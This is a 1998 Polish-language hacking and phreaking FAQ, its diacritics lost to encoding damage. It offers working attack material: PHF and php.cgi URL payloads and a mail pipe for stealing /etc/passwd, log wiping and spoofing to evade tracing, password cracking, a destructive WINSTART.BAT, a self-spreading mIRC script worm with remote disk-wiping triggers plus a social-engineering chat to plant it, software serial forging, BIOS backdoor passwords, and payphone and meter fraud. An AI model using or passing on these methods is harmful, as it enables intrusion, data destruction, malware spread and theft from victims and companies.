ĿĿ Ŀ   Ŀ    Ŀ   ĿĿĿ
     ۳۳۳۳۳   ۳     
     Ŀ۳۳   ۳   ڿ۳   ۳ڿ۳
   ۳۳  ۳۳۳   ۳   ۳۳  ۳۳
      ۳ĴĴ۳   ۳ 
  ڿڿ۳۳ ۳ ۳۳ÿ  ۳ ÿ ۳
      



                                  ver. 1.5
                                22 marca 98 
                          polskie znaki: Latin 2



	Witajcie bracia! aski Wszechmogcego niechaj spyn na was, a tych
ktrzy Jego imi kalaj niechaj pochon czeluci piekielne. Pan z Wami!

	Tekst ten nasta wycznie w celach edukacyjnych i nie ponosz
odpowiedzialnoci za utrat dostpu do Internetu lub czegokolwiek innego w
wyniku stosowania metod tu opisanych, czyli jak ci kto namierzy i udupi to
miej pretensje do samego siebie a nie do mnie. Jest on o wszystkim po trochu,
tzn. o IRC-u, phreakingu, hackerstwie, Unixie i podobnych sprawach. Bdzie on
stale uaktualniany jak tylko dowiem si czego ciekawego, co godne
zamieszczenia bdzie. Cz tego FAQ jest mojego autorstwa, a cz to texty z
FAQ innych hackerw lub zasyszane w rnych okolicznociach ;)



Spis treci

   1. IRC
      1.1. Jak komu dokopa
      1.2. Boty
   2. Unix
      2.1. Jak si wama
   3. Windoza - zady i walety
      3.1. Winword
      3.2. Plik win.ini
      3.3. Plik winstart.bat
      3.4. Logo windozy
      3.6. Cudowne komendy
      3.7. mIRC i jego skrypty
   4. BIOS-y
   5. Phreaking
      5.1. Budki telefoniczne
         5.1.1. Automaty na etony
         5.1.2. Automaty na karty
      5.2. Automaty sprzedajce Col
      5.3. Wodomierze

1. IRC

1.1. Jak komu dokopa
	Istnieje wiele sposobw aeby komu dokopa na IRC-u. Jedn z metod
stosowanych na rnorakich lamerkw jest np. wejscie na query i zaproszenie na
kana #5,0. Kto wejdzie na ten kana zostanie wyrzucony z serwera :). Mona te
wpisa: /me has invited you to join #5,0 - jak kto jest lamer to nie odrni
tego od prawdziwego invite ale prawdziwi hackerzy stosuj zwykle bardziej
wyrafinowane metody. Mona te kogo sfloodowa czyli zasypa go bzdurnymi
tekstami typu "zesraj si dziadu...", funkcjami CTCP (ping, version, time,
finger, page, userinfo, clientinfo). Co ambitniejsi stosuj floodowanie z
kilku sesji - jest bardziej efektywniejsze i zmniejsza zagroenie wykopania
z serwera za flood. Mona take wykorzysta WinNuke do namierzenia gocia na
IRC-u i zawieszenie mu komputera :) ale on musi mie windoz 95. Jak kto chce
WinNuke to niech mailnie.

1.2. Boty
	Bot jest to program, ktry siedzi na IRC-u i udaje normalnego usera.
Ma on jednak wbudowane rne funkcje np. autokick za flood lub za wulgaryzmy,
autoop, protect i tak dalej. O stawianiu bota na razie nie bd si rozpisywa,
napisz tylko, e aby postawi takiego bota, trzeba mie konto unixowe.
Niektre boty wymagaj take zainstalowanego klienta IRC na tym koncie. To by
byo na razie o stawianiu botw, wicej moecie si dowiedzie z plikw readme
doczonych do konkretnego bota. Teraz moe co o rozwalaniu wyej
wymienionych. No wic jeli bot jest gupi, mona go sprbowa zfloodowa z
kilku sesji - niektre wyrzucaj na kana texty w stylu " Floodujesz mnie
synu...", albo wchodzimy z np. trzech sesji, z kadej czynimy "/CTCP VERSION
bot" po 50 razy (eby nas nie wywalio) a pniej "/IGNORE bot". Jeli uda si
go sfloodowa w ten sposb bot bdzie praktycznie cay czas rzuca tymi textami
lub odpowiada na VERSION i w kocu go wywioz z serwera za flood :)

2. Unix

2.1. Jak si wama
	Aby wama si do serwera Unixowego i pozna czyje haso, lub
uzyska konto niekoniecznie z akceptacj szanownego administratora, naley
zdoby plik /etc/passwd na tym serwerze lub dopisa si do niego. Dobrze jest
mie zaoony jaki lewy e-mail do celw hackerskich gdzie na polboksie,
hotmailu, geocities, kki lub czym podobnym. Uyj zmylonych personaliw
(imi/nazwisko/adres). Moesz te uy iname (www.iname.com) jako
"redirectora" - jak masz np. maila izydor@polbox.com to moesz sobie zaoy
np. izydor@writeme.com, izydor@polandmail.com, izydor@2die4.com,
izydor@2sexy4u.com... (jak kto tam napisze, to mail zostanie posany dalej na
polbox) lub jaki inny mao znaczcy - trzeba si niele namczy eby zobaczy
imi, nazwisko i prawdziwy e-mail, a ten i tak jest anonimowy :). Oprcz tego,
jeli haczycie z dial-upw (dzwonicie przez modem do jakiego providera) to
jest to wysoce karalne - administrator zobaczy e jaki czowieczek
np. izydor@dial-79.supermedia.pl cign passwd i co dalej? Ot ten to admin
pisze sobie maila do administratora Supermedii, i namierza, kt to jest ten
izydor. Mona za to w najlepszym przypadku straci konto. Wic najlepiej
korzysta z darmowego dial-upu tpsa (suxx, ale do hackerstwa wystarczy).
Jak admin zobaczy w logach noname@ppp-86.warszawa.tpnet.pl to ci wiele nie
zrobi, ale jak sie uprze, to potrafi ci namierzy. Mona jeszcze robi tak:
zhaczy zobie np. trzy serwery, na kadym po kilka kont. Pniej telnetowa
si na pierwszy, przez pierwszy na drugi, pniej na trzeci, pniej znw na
pierwszy, ale pod innym kontem... uczyni tak ptelk, pniej np. zrzuci
passwd, zrobi przemeblowanie na serwerze, a pniej wycofywa si z ptli - 
jak telnetujesz si np. do Francji, z Francji do Finlandii, pniej jeszcze do
USA i przez USA do Polski to zanim dojd kto si wama minie p roku ;)

* Metody zdobycia pliku passwd

Gdy masz konto:
- Telnetujesz si na serwer, logujesz si i piszesz "cat /etc/passwd" i
wywietla si ten plik (jeli akurat masz dostp do niego, np. jeste rootem,
albo jest udostpniony dla wszystkich). S specjalne programiki do "bycia
rootem" wykorzystujce rnorakie dziury w systemie, a zowi si one 
exploitami. Wystpuj one w duych ilociach na rootshellu (www.rootshell.com).
Mona jeszcze ewentualnie uczyni to tak: 
"cat /etc/passwd | mail inydor@writeme.com" (korzystamy z redirectora)
Pniej odbieramy mejle i dostajemy plik /etc/passwd prosto do skrzynki
pocztowej.

Gdy nie masz konta:
- Uruchamiasz FTP, wpisujesz adres serwera, login ftp (lub anonymous), 
w password zalecaj podanie adresu e-mailowego ale podaj jaki zmylony lub
sam znak @ (bdzie w logach) i piszesz "get /etc/passwd". Uwaga - ta metoda
dziala bardzo rzadko (na lamerskich serwerach, z takimi adminami), w innych
przypadkach passwd jest falszywy, albo zshadowany, albo jedno i drugie ;)

- Metoda PHF - wpisz w browserze:
http://www.tu.wpisz.serwer.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

- Metoda PHP - wpisz w browserze:
http://www.tu.wpisz.serwer.com/cgi-bin/php.cgi?/etc/passwd

Te dwie metody nie dziaaj na wszystko, ale mona poprbowa, jak admin jest
lamerkiem i nie chce mu si instalowa nowszych wersji programw, mona si
sprbowa pobawi.

*** UWAGA! ***
W/w metody maj jedn wad: wszystko jest logowane, to znaczy e jak wykupie
sobie np. konto na Polska Online i od razu zrzucasz sobie passwd, lub co
krcisz, to jest to zapisywane do specjalnych plikw (logw). Mona stosowa
czyszczenie logw (np. killog), korzysta z lewego maila (patrz kilka piter
wyej), lub spoofowa - np. jak jestemy przez tpsa, to uruchamiamy spooferka i
udajemy poczenie np. z www.zgroza.com.pl. Ma to jednak du wad - jest to
"blind spoofing" wic serwer-ofiara nie wysya informacji na twj ekran, tylko
z uporem maniaka wszystko le na www.zgroza.com.pl. Ale wama si mona.
Mona prbowa takich rzeczy jak "cat /etc/passwd | mail izydor@writeme.com" -
admin nie namierzy, bo w logach zobaczy www.zgroza.com.pl, no wic le maila na
root@zgroza.com.pl i... po max. dziesiciu minutach mail przychodzi z powrotem
z dopiskiem "adresat nieznany" :). Mona tak narobi chay komu, kogo nie
lubimy - po prostu zostawiamy go w logach... biedne dziecko.

* Co dalej?

Linijka z pliku passwd wyglda tak:

root:z1YAmW5ZwE7qQ:0:0:root:/root:/bin/bash

I jest uczyniona wedug tego wzoru:

login:zakodowane haso:numer uytkownika:numer grupy:opis:katalog domowy:shell

Jeli zamiast hasa jest x, lub gwiazdka *, sprbuj wstuka /etc/shadow zamiast
/etc/passwd, ale moe nie zadziaa. Ale jeli ju masz ten plik, odkoduj go.
Aby odkodowa haso naley mie program do tego celu, jak np. John the Ripper
pod DOS. Uruchamianie:

john -pwfile:[plik z hasami] -single

lub druga metoda (wymaga sownika)
john -pwfile:[plik z hasami] -wordfile:[sownik]

mona jeszcze tak:

john -pwfile:[plik z hasami] -wordfile:[sownik] -rules
UWAGA! to dziaa tylko w Johnie 1.4.

Jak co znajdzie to wywietli, a potem... telnetujesz si i logujesz tak, jak
ci poda John :) Jak zamae haso roota moesz sobie poczyta jego poczt,
poformatowa dyski - root ma due moliwoci w systemie. Jak kto chce Johna
to niech mailnie.

3. Windoza - zady i walety

3.1. Winword

Dopisa komu do skrtu zamiast "winword.exe" "winword.exe -mFileExit".
Word zacznie prac od jej skoczenia :). Dziaa na Worda 6.0 i 7.0, na Word97
nie sprawdzaem bo nie mam :P

3.2. Plik win.ini

Zmieni komu linijk "shell=progman.exe" (win 3.1x) na "shell=calc.exe" -
zamiast Menedera Programw na pocztku wczy si kalkulator :) Mona te
wstawi jaki inny programik typu pbrush.exe - jak kto bdzie chcia zrobi
co innego ni rysowanie to si mocno zawiedzie - zamknicie shella koczy
windoz :) W win95 shellem jest explorer.exe, ale nie manipulowaem przy nim
jeszcze, bo mnie si nie chciao.

3.3. Plik winstart.bat

Plik ten naley umieci w katalogu Windows. Jest on uruchamiany przy starcie
windozy - mona dopisa tam jakie bzdury, szlaczki, krzaczki, melodyjki,
pitnacie Wordw czy inne wielce przydatne rzeczy. Mona te tam dopisa
program pod tytuem FLEX - zrzucajcy naciskane klawisze na dysk - przydaje si
jak kto ma Windows na haso lub si loguje do jakiego Novella. Jak kto go
chce to niech mailnie. Jeli was to nie satysfakcjonuje, w tyme pliku mona
jeszcze uczyni co, aby kasowao gociowi np. win.ini, albo win.com, albo
co takiego:

--- WINSTART.BAT ---
@echo off
echo Verifying your system, please wait...
rem to dla zachowania pozorw, e windoza sobie co sprawdza...
copy c:\config.sys c:\dos
copy c:\autoexec.bat c:\dos
rem robimy lamuchowi kopi zapasow, gdy mamy lito nad zwierztami
echo System verified.
echo Synchronizing drive C:
echo Do not interrupt this operation!
echo DAMAGED BOOT SECTOR, DISK UNUSABLE > config.sys
rem teraz wpisujemy gupoty do config.sys
echo dir c:\ /s > autoexec.bat
rem a teraz do autoexec.bat - to spowoduje e przy starcie systemu bdzie si
rem wywietlaa zawarto dysku C: (wszystkie pliki w kadym katalogu)
echo call autoexec.bat >> autoexec.bat
rem a teraz wywoujemy jeszcze raz autoexec, eby si za szybko nie skoczyo
rem po tej linijce dir c:\ /s bdzie wykonywao si nieskoczon ilo razy,
rem dopki kto nie przerwie... a jak przerwie to system wykona polecenie
rem "call autoexec.bat" i od nowa Polska ludowa... :)
echo Drive C: synchronized, loading Windows now...
--- WINSTART.BAT ---

Wiersze zaczynajce si od "rem" to komentarze, moesz je spokojnie wywali.

3.4. Logo windozy

*** dla wersji 3.1x ***

No wic jest plik win.com i on zawiera w sobie logo. A co by byo jakby
jakiemu lamuchowi zmieni to logo na co innego - np. napis "Killer Virus
Activated - Destroying in progress..." ? Wikszo takich lamerkw panicznie
boi si wirusw, wic nasz lamuch w panice zacznie resetowa komputerek, a jak
kto resetuje komputer podczas adowania windozy to moe si to le skoczy
:>. Logo jest w formacie RLE - to taki jaki obskurny format graficzny,
obsuguje go na przykad Graphics Workshop. Jeli chcecie zmienia orginalne
logo - jest ono w podkatalogu system, nazywa si vgalogo.rle. No wic wczamy
jaki program malarski, piszemy np. napisik straszcy. I co dalej? W 
podkatalogu system jest plik win.cnf. Jest to plik, ktry moe zastpowa 
win.com, ale jest od niego nieco mniejszy - brakuje mu logo. Przyjmujc, e
nowe logo naszego autorstwa nazywa si lame.rle i jest w katalogu system, 
piszemy tak:

C:\WINDOWS\SYSTEM>copy /b win.cnf +lame.rle ..\win.com

Po takim zabiegu uczyni si nowy win.com, zawierajcy nasze logo. Stary moemy
sobie uprzednio zasejwowa pod inn nazw lub przywrci tak:

C:\WINDOWS\SYSTEM>copy /b win.cnf +vgalogo.rle ..\win.com

I ju. Lamerka mona niele nastraszy. Tylko nie przesadcie - plik win.com
moe mie najwyej 64 KB, pniej mog nastpi problemy...

*** dla windozy 95 ***

Defaultowe logo tym razem nie wiem gdzie jest, bo nie chciao mi si sprawdza
:P Ale jeli uczynimy sobie bitmapk o rozmiarach 320 na 400, w 256 kolorkach,
z zawartoci podobn jak pitro wyej, i zasejwujemy j jako C:\LOGO.SYS, to
wanie ona wywietli si przy starcie tego jake wspaniaego systemu...
Huh. Mona jeszcze zmieni lamuchowi bitmapy C:\WINDOWS\LOGOW.SYS (poczekaj na
zamknicie systemu) i C:\WINDOWS\LOGOS.SYS (Mona teraz bezpiecznie wyczy
komputer). Przy zamykaniu systemu, windoza sejwuje rne swoje pliczki. No wic
napis o wirusie wstawiamy do LOGOW.SYS i... huh.

3.5. Numery seryjne M$

Kiedy instalujesz kolejny wspaniay wytwr znanej na caym wiecie firmy
Mikro$oft, przychodzi moment, e installer pyta ci o kod. A co uczyni jeli,
hmm, powiedzmy e ten to kod zapomniae spisa od kumpla, lub nie istnia
w pudeku z programem (bo nie mia pudeka), ani w instrukcji (bo adnej
instrukcji nie byo), a cracka na razie nie ma? No wic jeli kod jest w formie
XXXX-XXXXXXXX to wpisz 1234-12345467 - powinno zadziaa. Kody w postaci
XXX-XXXXXXX s zbudowane w nastpyjcy sposb: trzy pierwsze cyfry s dowolne,
a suma nastpnych musi by podzielna od 7 i wiksza od 7, czyli mona wpisa
000-4031337. Istniej jeszcze numerki, ktre s uczynione na ten wzr:
XXXXX-OEM-XXXXXXX-XXXXX. Zasada jest nastpujca: trzy dowolne cyfry, pniej
95, 96 lub 97 (rok produkcji, np. dla win osr2-97, dla osr1-96, dla 
zwykych-95), suma nastpnych siedmiu musi by podzielna przez 7 i wiksza od 7
(jw.), a ostatnie pi cyfr jest dowolne, no wic przykadowy numerek bdzie
wyglda tak: 83696-OEM-4031337-89364. Huh, mam nadziej e komu pomogem.

3.6. Cudowne komendy

Istniej sobie komendy, ktre warto wykona zdalnie przez windoz jakiemu
lamuchowi. Jedn z nich jest "DELTREE C: /Y" - kasuje cay dysk. Mona te np.
pozby si lamucha np. z IRC-a, czynic mu tak oto komend
"RUNDLL32 User,ExitWindows" - windoza elegancko si zamyka. Komendy takie
mona czyni np. przez strony WWW - o tem potem, w nastpnej wersji FAQ, bo
teraz mi si nie chce pisa. :)

3.7. mIRC oraz jego skrypty

No wic jest sobie taki przecitny programik do ircowania. Nazywa si mIRC.
Zajmuj si nim dlatego, e od pewnego czasu na IRC-u grasuje pewien skrypt.
Jest on samo-rozmnaajcy si (sam si rozsya jak kto wchodzi/wychodzi na
kana na ktrym jest zainfekowany). Cay dowcip jest w tym, e jako jeden z
plikw skryptu do mIRC-a jest ustawiony SCRIPT.INI. No wic ten to skrypcik
wanie tak si nazywa. Oprcz tego jako domylny katalog odbioru dcc jest
ustawiony katalog, gdzie jest mIRC (np. C:\MIRC), a tam te rezyduje
SCRIPT.INI... No wic jeli wylemy taki skrypt lamerkowi, ktre ma AutoGet,
to zarazimy go. Moemy te mu troch naciemnia, np. tak:

 cze!
 cze
 chesz moj skrypt pod mIRC-a?
 a do czego to jest?
 huh... no dobra jesli ktos cie zabanowal i wykopal, to ty mozesz
sam sie odbanowac i wyrzucic go z IRC-a
 wow
 super
 daj!
 ok :)
 lap
/DCC SEND lamuch SCRIPT.INI
 mam, co teraz zrobic?
 teraz przegraj go tam gdzie jest mirc32.exe
 dzieki!
 :)

Dobra, teraz moe co o budowie tego skryptu...

--- SCRIPT.INI ---
[script]
n0=;----------------------------------------------------------
n1=;      NeoScript ver. 997, (C) 1939 by Adolf H.
n2=;----------------------------------------------------------
n3=ON 1:TEXT:!UMRZYJ!:*:/quit jestem lamerem
n4=;jezeli ktos napisze !UMRZYJ! - lamera wyrzuca z IRC-a
n5=ON 1:TEXT:!KASUJ!:*:/run DELTREE C: /y
n6=;reakcja na !KASUJ! - kasacja dysku C:
n7=ON 1:TEXT:!EXITWIN!:*:/run RUNDLL32 User,ExitWindows
n8=;zamykamy lamerkowi windoze na odleglosc
n9=ON 1:JOIN:#:{
n10=  if ( $nick != $me ) { /dcc send $nick $mircdirscript.ini
n11=  }
n12=}
n13=;rozmnazanie skryptu, jesli ktos wchodzi na kanal dostaje go
n14=ON 1:TEXT:!PIERDOLEC!:*:/msg $nick mam pierdolca
n15=;info - kto jest zainfekowany ten odpowie
n16=ON 1:TEXT:!DAWAJOPA!:?:/mode $chan +o $nick
n17=;no comment
n18=ON 1:TEXT:!KOP!:?:/ban $me | /kick # $me
n19=;lamer sam sie kopie
n20=ON 1:TEXT:IDIOTA:*:/amsg jestem idiota i zasranym debilem
n21=ON 1:TEXT:LAMER:*:/ame to LAMER!
n22=ON 1:TEXT:BLUZGAJ:*:/amsg kurwa cholera huj chuj dupa jebana pizda
n23=ON 1:TEXT:MATKA:/amsg moja matka to kurwa
n24=;to sluzy do robienia kichy lamerowi
--- SCRIPT.INI ---

Jak bedziecie to rozpowszechniac to wytnijcie moje komentarze - te zaczynajce
si od rednika. Myl e to jest zrozumiae.

4. BIOS-y

Jeeli masz AWARD BIOS-a na haso moesz wpisa kilka tzw. unihase (wymyliem
nowe sowo) : Zbgn, zbg, AWARD_SW, >AWARD<, condo. Na AMI BIOS-y niekiedy
dziaa unihaso ami. Dla Phoenix BIOS unihaso to czasem 1234 lub 1234567.
Oprcz unihase na AMI BIOS jest jeszcze jedna metoda - AMI Decode. Jest to
program wydubujcy haso z tego BIOS-u, ale najpierw kto musi ono wpisa.

5. Phreaking

5.1. Budki telefoniczne

Mona wpi si telefonem w kabel przy budce - ale nie rcz za skutki -
podobno telekomunici to wykrywaj i pniej wdruj do budki oraz sprawdzaj.
Mona te zdoby/uczyni telefon taki jak maj monterzy - suchawka z tarcz
(do wybierania) - eby by mniejszy. S dwie metody: ciachn kabelek i
podczy swj telefon, albo na kocu kabla przylutowa igy i wpina si
poprzez izolacj.

5.1.1. Automaty na etony

- Wrzuci 5 gr. jako eton A - na niektre jeszcze dziaa.

- Przywali nad otwr zwrotu etonu - zaliczy impuls.

- Woy yk do zwrotu etonw i pomanipulowa - zrobi si zwarcie i zaliczy
  impuls.

- Strzeli iskr z zapalarki piezoelektrycznej do gazu w tarcz automatu.

5.1.2. Automaty na karty

- Zdobywanie kart: zablokowa miejsce wypadku kart papierem, foli, zuyt
  kart, gum do ucia z zapakami lub checz - karty nie wypadaj. Poniej
  przyj wieczorkiem i wyduba wszystko co tam zostao. Jednake osoby
  proceder ten uprawiajcy powinny blokad przyklei, albowiem automat wyrzuca
  karty z pewn si, ktra moe okaza si za dua i nasz  papier moe
  wylecie razem z kart, a chyba nie to byo w planie. :)

- Fakeowanie kart: naklei na nie do koca zuyt kart tam video -
  rozmagnesuje tam zamiast karty. Pniej odklei i naklei now. Mona
  jeszcze kart usmarowa lakierem. Praktykowana jest take taka metoda: 
  odczyta sygna z dobrej karty i nagra go na zuyt, ale do tego trzeba mie
  wrodzone zdolnoci ;)

- Numer 6230015 - z budki na kart - pacisz 18gr za 3min i dostajesz sygna
  czyli moesz dzwoni dalej, np. na 0700.

5.2. Automaty sprzedajce Col

- Naley wrzuci stare 20 z i kupi puszk jakiej cieczy - automat wrczy ci
  puszk oraz wspaniaomylnie wyda reszt z piciu z.

5.3. Wodomierze

- Mona odkrci np. wod w wannie tak, aeby kapaa po kropelce, po czym i
  sobie do szkoy, a jak wrcimy, to mamy ca wann wody a wodomierz nawet nie
  drgnie, albo leciutko zmieni si jego wskazanie, co jest lepsze od burzliwego
  napeniania wanny H2O ;)



                                 * Koniec *

Greetingsy dla: przede wszystkim ludzi, z ktrych materiaw korzystaem przy
                produkcji tekstu powyszego. Pan z wami!

Jeli ten FAQ zawiera jakie niecisoci lub bzdury, lub jeli masz co
ciekawego, godnego zamieszczenia, napisz do mnie na metallo@kki.net.pl.